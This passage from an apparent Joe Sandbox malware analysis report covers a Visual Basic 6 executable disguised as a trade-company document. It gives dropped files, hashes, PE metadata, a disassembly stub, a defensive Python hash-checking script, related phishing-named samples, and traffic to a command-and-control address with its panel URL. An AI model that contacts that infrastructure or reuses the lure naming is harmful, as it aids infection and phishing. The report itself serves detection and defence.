            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 20.82.210.154, 23.211.4.86, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 40.126.31.135, 20.190.159.134, 40.126.31.139, 40.126.31.8, 20.190.159.132, 40.126.31.1, 40.126.31.6, 20.190.159.138, 51.11.168.232, 13.107.42.13, 13.107.42.12, 20.50.102.62
            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458277/sample/KHAWATMI CO.IMPORT & EXPORT.exe

            Simulations

            Behavior and APIs

Time | Type | Description
08:12:29 | API Interceptor | 1x Sleep call for process: KHAWATMI CO.IMPORT & EXPORT.exe modified

            Joe Sandbox View / Context

            IPs

Match: 185.227.139.18

Associated Sample Name | Detection | Context
RQF00432117.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/BEF2P6YRqV1nZ
ikenna.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/rr9an1w9Exqdo
Purchase Order No#76480023.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/IDEUeAngcojy8
rjHOcnLYGHZCy5f.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
jdik4JxEILyMsaJ.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/W9ZqiawWCXST6
BC 1.1 ASTRA JUOKU.pdf.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/yfNQXpqQZjJcw
DHL Shipment Detailspdf.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/rD5fy9Ok7coFb
1SUxqGW4Vk.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
swift.xlsx | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
EshGqi8G0p.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/o6INQXqciSF92
RFQ file_pdf.gz.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/rVXhi7NTm83H7
oidItpvxvp.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
Advance Payment and shedule update.xlsx | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
Documents.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/fw2pM7fnRpMCI
d3mSX5c3S5.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
gunzipped.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/6mr5C1QFWrZ4O
invoice.xlsx | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx
yGeKxvNPm4.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
C1nbP5vVzw.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/NHNmTUOdS6fzz
rYUbPNiimt.exe | malicious | 185.227.139.18/dsaicosaicasdi.php/jRbn3g7uWVTsx

            Domains

            No context

            ASN

Match: DIGITURUNCTR

Associated Sample Name | Detection | Context
RQF00432117.exe | malicious | 185.227.139.18
ikenna.exe | malicious | 185.227.139.18
Purchase Order No#76480023.exe | malicious | 185.227.139.18
rjHOcnLYGHZCy5f.exe | malicious | 185.227.139.18
jdik4JxEILyMsaJ.exe | malicious | 185.227.139.18
BC 1.1 ASTRA JUOKU.pdf.exe | malicious | 185.227.139.18
DHL Shipment Detailspdf.exe | malicious | 185.227.139.18
1SUxqGW4Vk.exe | malicious | 185.227.139.18
swift.xlsx | malicious | 185.227.139.18
EshGqi8G0p.exe | malicious | 185.227.139.18
RFQ file_pdf.gz.exe | malicious | 185.227.139.18
oidItpvxvp.exe | malicious | 185.227.139.18
Advance Payment and shedule update.xlsx | malicious | 185.227.139.18
Documents.exe | malicious | 185.227.139.18
d3mSX5c3S5.exe | malicious | 185.227.139.18
gunzipped.exe | malicious | 185.227.139.18
invoice.xlsx | malicious | 185.227.139.18
yGeKxvNPm4.exe | malicious | 185.227.139.18
C1nbP5vVzw.exe | malicious | 185.227.139.18
rYUbPNiimt.exe | malicious | 185.227.139.18

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
            Process:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Reputation:high, very likely benign file
            Preview: 1
            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
            Process:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            File Type:data
            Category:dropped
            Size (bytes):598
            Entropy (8bit):0.6390116820665388
            Encrypted:false
            SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbON:+
            MD5:E306B2B657314B7CA1B899F1A8B2A979
            SHA1:DDF029D39D1A076A4218049CBD5143EE64A0D13B
            SHA-256:A3284A821DC0F8281285B68E3F1F2712F6D5B97E605233AC91235F780D55DCE4
            SHA-512:EF935FBEDB6A39D819F650912E4E72355A6B395B01D15DE89CB30045A7330936CC1964C3CA771F8A9327043D734D5CD252DD91DE858A28E97283E310A988E41B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.387725511048366
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:KHAWATMI CO.IMPORT & EXPORT.exe
            File size:147456
            MD5:0153ae8cf4b1f546721332b5cb3f973c
            SHA1:479858ef740172cb3791527a9c9d0da76eec3af4
            SHA256:97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
            SHA512:1a6ae92b4937ea140069189487e669377f8a59ceffa29597f18c94d83646184344f4ba4d0fe42ce5153d95791ad31b3fe8b715b6a55fe3b923ce59fd4201bac1
            SSDEEP:1536:EtVr5LC183SqwDIse4yckz/50ZG8tnSSyeMn5iXDjTf8+Oh1K:E/5CIRwDdeZcFYeMn5iXDj5Oh1K
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...#..V.....................0............... ....@................

            File Icon

            Icon Hash:c4e8c8cccce0e8e8

            Static PE Info

            General

            Entrypoint:0x4014b4
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x56A2ED23 [Sat Jan 23 03:01:55 2016 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:fef384fc3a66a559dff455f07d497ca0

Entrypoint Preview

The first two instructions (a push of a pointer into the image followed by a call into the MSVBVM60 runtime) are the standard Visual Basic 6 startup stub; what follows is the disassembler reading the VB project header's data bytes as code, so the remaining lines carry no meaning as instructions.

Instruction
            push 00401EBCh
            call 00007F0E0C9517B3h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            inc eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [ebp+39C0B02Ah], al
            xor dword ptr [eax-2DAA55BCh], 16h
            adc byte ptr [bx+si-62h], dh
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            inc ecx
            add byte ptr [eax], ah
            or byte ptr [ecx+00h], al
            inc esp
            inc ebp
            dec ebp
            dec ecx
            dec esi
            inc ebp
            push edx
            inc ecx
            dec esp
            dec ecx
            push ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add bh, bh
            int3
            xor dword ptr [eax], eax
            add byte ptr [eax+72h], al
            js 00007F0E0C951825h
            call far 0055h : 914061FDh
            jl 00007F0E0C95180Bh
            inc esp
            inc esp
            inc eax
            daa
            adc ch, bh
            jbe 00007F0E0C951760h
            shr byte ptr [edi-7B6F79B1h], FFFFFFFBh
            enter 9718h, 57h
            cmp cl, byte ptr [edi-53h]
            xor ebx, dword ptr [ecx-48EE309Ah]
            or al, 00h
            stosb
            add byte ptr [eax-2Dh], ah
            xchg eax, ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            sbb al, 09h
            add byte ptr [eax], al
            pop ss
            or dword ptr [eax], eax
            add byte ptr [eax], al
            or al, byte ptr [eax]
            push 00000075h
            js 00007F0E0C951836h
            popad
            jo 00007F0E0C951831h
            jnc 00007F0E0C95182Bh
            je 00007F0E0C9517C2h
            or eax, 46000B01h
            outsd
            jc 00007F0E0C951827h

            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20b14 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0xbfc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 | (in the headers, outside any section)
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x190 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2010c | 0x21000 | False | 0.378292199337 | data | 6.67763542403 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x11bc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x24000 | 0xbfc | 0x1000 | False | 0.310791015625 | data | 3.24011988097 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x24354 | 0x8a8 | data | |
RT_GROUP_ICON | 0x24340 | 0x14 | data | |
RT_VERSION | 0x240f0 | 0x250 | data | Chinese | Taiwan

            Imports

DLL: MSVBVM60.DLL
Imports: _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaR4Str, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaR8Str, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr
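The following is an added example, not code from the Joe Sandbox report or from any tool it uses. It re-derives three of the static values printed in this report so they can be checked here and applied to other samples: the PE header timestamp (0x56A2ED23 above) decoded to UTC; the "Import Hash" (imphash) computed the way pefile does it, from the MSVBVM60.DLL import list in the Imports table; and the hashes of the one-byte lock file B52B3F.lck listed under Created / dropped Files (Preview "1"). That the printed import order equals the on-disk import-table order is an assumption, so the computed imphash is checked for form and order-sensitivity rather than asserted equal to the report's fef384fc3a66a559dff455f07d497ca0.

```python
"""Re-derive static PE fields from the Joe Sandbox report (added example)."""
import hashlib
from datetime import datetime, timezone

# Import names copied from the report's Imports table, in printed order.
MSVBVM60_IMPORTS = [n.strip() for n in """
_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove,
__vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1,
__vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32,
__vbaAryDestruct, __vbaVarForInit, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i,
__vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk,
EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2,
__vbaR4Str, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release,
_CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem,
_adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaR8Str, __vbaVar2Vec,
_adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList,
_adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarDup,
__vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, __vbaCastObj, _allmul,
__vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeObj, __vbaFreeStr
""".split(",")]


def decode_pe_timestamp(ts: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def imphash(imports) -> str:
    """imports: [(dll_name, function_name), ...] in import-table order.

    Mirrors pefile's get_imphash() for functions imported by name: lower-case
    the DLL name, strip a .dll/.ocx/.sys extension, append "." and the
    lower-cased function name, join all entries with "," and MD5 the string.
    Ordinal imports (which pefile resolves through a lookup table) are not handled.
    """
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        base, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            lib = base
        parts.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def report_imphash() -> str:
    """imphash of the single-DLL import table printed in the report."""
    return imphash([("MSVBVM60.DLL", name) for name in MSVBVM60_IMPORTS])


def file_hashes(data: bytes) -> dict:
    """The three digests the report prints for a dropped file."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


if __name__ == "__main__":
    print("timestamp:", decode_pe_timestamp(0x56A2ED23))
    print("imphash:  ", report_imphash())
    print("B52B3F.lck:", file_hashes(b"1"))
```

Two things worth knowing when using these values as pivots. Every Visual Basic 6 executable imports a near-identical set of runtime helpers from MSVBVM60, so the imphash of such a sample mostly says "VB6 binary" rather than identifying a particular build or family. And the presence of DllFunctionCall is how VB6 code reaches arbitrary Win32 APIs declared at run time, which is why the import table here says nothing about what the sample actually calls; the behavioural signatures in this report are the better source for that.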

            Version Infos

Description | Data
Translation | 0x0404 0x04b0
InternalName | Tolip
FileVersion | 1.00
CompanyName | Intersection Road
Comments | Intersection Road
ProductName | Gender7
ProductVersion | 1.00
OriginalFilename | Tolip.exe

            Possible Origin

Language of compilation system | Country where language is spoken
Chinese | Taiwan

            Network Behavior

            Network Port Distribution

            TCP Packets

Timestamp  Source IP:port -> Destination IP:port
Aug 3, 2021 08:12:26.496088028 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.639414072 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:26.639549971 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.643964052 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.786485910 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:26.786619902 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.930691957 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.484879971 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.484932899 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.484957933 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485121012 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.485558033 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485590935 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485613108 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485644102 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485672951 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.485712051 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.485745907 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.485831022 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.486145020 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.486296892 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.486567974 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.486604929 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.486675024 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.499150991 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.841173887 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.983741999 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:27.983902931 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.995006084 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.137423038 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.138072014 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.280507088 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.866781950 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.866821051 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.866832018 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.867017031 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.867089987 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.867142916 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.867163897 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.867290020 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.868438005 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.868715048 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.868745089 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.868757963 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.868798971 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.868832111 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.868849039 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.869251966 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.869268894 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.869271994 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.869273901 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.869276047 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.057308912 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.199930906 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:29.200562000 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.223743916 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.366354942 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:29.366456985 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.508951902 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140487909 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140530109 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140542984 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140723944 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.140746117 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140779972 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140794992 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.140938044 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.141019106 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.141048908 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.141063929 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.141130924 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.141268969 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.141295910 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.141438961 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.142525911 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.158453941 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:30.159250975 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.481532097 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.624118090 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:30.624241114 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.628950119 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.771459103 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:30.783184052 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:30.925868988 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.508862972 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.508893013 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.508903027 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509040117 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:31.509071112 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509094954 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509108067 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509177923 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:31.509356976 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509377003 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509387970 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509448051 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:31.509663105 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509704113 CEST  185.227.139.18:80 -> 192.168.2.3:49756
Aug 3, 2021 08:12:31.509771109 CEST  192.168.2.3:49756 -> 185.227.139.18:80
Aug 3, 2021 08:12:31.510674953 CEST  185.227.139.18:80 -> 192.168.2.3:49756
